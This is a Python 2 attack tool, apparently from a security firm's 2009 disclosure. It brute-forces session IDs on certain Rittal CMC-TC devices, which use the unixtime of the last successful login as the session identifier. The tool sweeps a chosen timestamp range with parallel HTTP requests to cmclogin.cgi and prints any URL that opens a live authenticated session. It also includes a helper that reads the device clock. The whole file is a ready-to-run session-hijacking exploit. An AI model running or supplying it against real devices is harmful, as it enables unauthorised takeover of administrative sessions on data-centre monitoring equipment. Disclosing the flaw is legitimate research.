#    __             __   _   _  __    __                  __      
#   / /  ___  __ __/ /  (_) / |/ /__ / /__    _____  ____/ /__ ___
#  / /__/ _ \/ // / _ \/ / /    / -_) __/ |/|/ / _ \/ __/  '_/(_-<
# /____/\___/\_,_/_//_/_/ /_/|_/\__/\__/|__,__/\___/_/ /_/\_\/___/
#
# Copyright 2009 Louhi Networks Oy
# All rights reserved. No warranties,
# no liabilities, information provided 'as is'
# for educational purposes. Reproduction and
# commercial use allowed as long as credit is given
# 
# Progressbar library subject to LGPL
# progressbar  - Text progressbar library for python.
# Copyright (c) 2005 Nilton Volpato
#
#   _______  ________  __            __    
#  / ___/  |/  / ___/ / /  ______ __/ /____ 
# / /__/ /|_/ / /__  / _ \/ __/ // / __/ -_)
# \___/_/  /_/\___/ /_.__/_/  \_,_/\__/\__/

import errorhandler
import re
import urllib2
import sys
import string
from progressbar import ProgressBar, Percentage, ETA, Bar
from multiprocessing import Pool

from optparse import OptionParser

def parseoptions():
    usage = "usage: %prog -d host:port -l lower_limit -h upper_limit -p processes\n\n\
    Certain Rittal CMC-TC versions use unixtime of successful login event\n\
    as a session identifier for the user. If approximate login time is known,\n\
    and a session is active, this tool can find the it.\n\
    For example, an administrator/script logs in to the device every morning\n\
    between 9am and 10am. Using that information, we convert the date and time\n\
    of chosen day to unixtime. This gives us lower and upper limit for \n\
    bruteforcing.\n\n\
    Converting date to unixtime is left as an exercise for the reader.\n\n\
    URL format: http://cmc.example.com:42/cmclogin.cgi?030101011234567890 \n\
    For example:\n\
    CMC-brute.py -d cmc.example.com:42 -l 1234560000 -u 1234567890 -p 5 \n\
    tries session IDs between 1234560000 and 1234567890, with 5 child processes"

    parser = OptionParser(usage=usage, version="%prog 0.001")
    parser.add_option("-d", "--destination", dest="host",
                  help="", metavar="HOST:PORT")
    parser.add_option("-p", "--processes", dest="processcount",
    help="", metavar="PROCESSES")
    parser.add_option("-l", "--low-limit", dest="lower",
    help="", metavar="LOWER")
    parser.add_option("-u", "--upper-limit", dest="upper",
    help="", metavar="UPPER")
    parser.add_option("-t","--time", action="store_true", dest="time")
    (options, args) = parser.parse_args()

    if options.host == None:
        print '    __             __   _   _  __    __                  __      '
        print '   / /  ___  __ __/ /  (_) / |/ /__ / /__    _____  ____/ /__ ___'
        print '  / /__/ _ \/ // / _ \/ / /    / -_) __/ |/|/ / _ \/ __/  \'_/(_-<'
        print ' /____/\___/\_,_/_//_/_/ /_/|_/\__/\__/|__,__/\___/_/ /_/\_\/___/'                                                                     
        print '   _______  ________  __            __    '
        print '  / ___/  |/  / ___/ / /  ______ __/ /____'
        print ' / /__/ /|_/ / /__  / _ \/ __/ // / __/ -_)'
        print ' \___/_/  /_/\___/ /_.__/_/  \_,_/\__/\__/' 
        print 'Try -h or --help for information about the program'
        sys.exit()

    try:
        if options.time:
            return options
        else:
            if int(options.processcount) <= 0:
                options.processcount = 1
            if int(options.lower) < 0:
                options.lower = 0
            if int(options.upper) < 0:
                print 'Error: Try using positive numbers for upper limit'
                sys.exit()
            if int(options.lower) > int(options.upper):
                print 'Error: Lower limit is higher than upper limit.'
                sys.exit()
    except:
        print 'Try -h or --help for usage.'
        sys.exit()

    return options

options = parseoptions()

opener = urllib2.build_opener(errorhandler.DefaultErrorHandler())
urllib2.install_opener(opener)


def checkDeviceTime(host):
    req = urllib2.Request('http://' + host + '/')
    try:
        f = opener.open(req)
        print f.info().getheader("Date")
    except:
        print 'Error while reading server response'
    return 1

def bruteSession(host,lowlimit,highlimit,progress):
    
    i = lowlimit
    if progress:
        widgets = ['Approximate progress: ', Percentage(), ' ', Bar(marker='0',left='[',right=']'),' ', ETA()]
        pbar = ProgressBar(widgets=widgets, maxval=(highlimit-lowlimit+1))
        pbar.start()
    
    regexp1 = re.compile('CMC-TC|Wrong user')
    regexp2 = re.compile('Error')
    
    while i <= highlimit:

        req = urllib2.Request('http://' + host + '/cmclogin.cgi?03010101' + str(i))

        try:
            f = opener.open(req)
            content = f.read(64)
        except:
            print 'Error while reading server response'
            continue

        if (hasattr(f, 'status') and f.status != 502) or (not hasattr(f, 'status')):
            if regexp1.search(content) == None and regexp2.search(content) == None:
                print ' '
                print '******************************************'
                print ' '
                print ' '
                print 'Found valid session. URL: '
                print f.url
                print ' '
                print ' '
                print '******************************************'
                print ' '
                return(1)
        else:
            print 'Error in URL structure'
            return(-1)

        if progress:
            pbar.update(i-lowlimit)
        
        i += 1
    
    return(0)



if __name__ == '__main__':

    host = options.host
    
    if options.time:
        checkDeviceTime(host)
        sys.exit()

    lower = int(options.lower)
    upper = int(options.upper)
    processcount = int(options.processcount)

    if processcount > (upper-lower+1):
       processcount = 1

    pool = Pool(processcount)
 
    range = int((upper - lower + 1)/processcount)
    
    r = []
    finished = False
    rcount = 0

    tmplow = lower

    print upper-lower+1,'HTTP requests will be made using',processcount,'child processes.'

    if processcount == 1:

        r.append(pool.apply_async(bruteSession, (host,lower,upper,True)))
        r.pop().wait()
        pool.close()
        sys.exit()
    else:

        r.append(pool.apply_async(bruteSession, (host,tmplow,tmplow+range-1,True)))
        tmplow = tmplow + range

        while tmplow < upper:

            if (upper-tmplow+1) >= 2*range:

                r.append(pool.apply_async(bruteSession, (host,tmplow,tmplow+range-1,False)))
                tmplow = tmplow+range
                
            else:

                r.append(pool.apply_async(bruteSession, (host,tmplow,upper,False)))
                tmplow = upper
                
        while not finished:
            for i in r:
                try:
                    if i.get(1) == 1:
                        finished = True
                    if i.get(1) == 0 or i.get() == -1:
                        rcount += 1
                    i.wait(1)
                except:
                    continue
            if rcount >= processcount:
                finished = True

        pool.terminate()
        sys.exit()
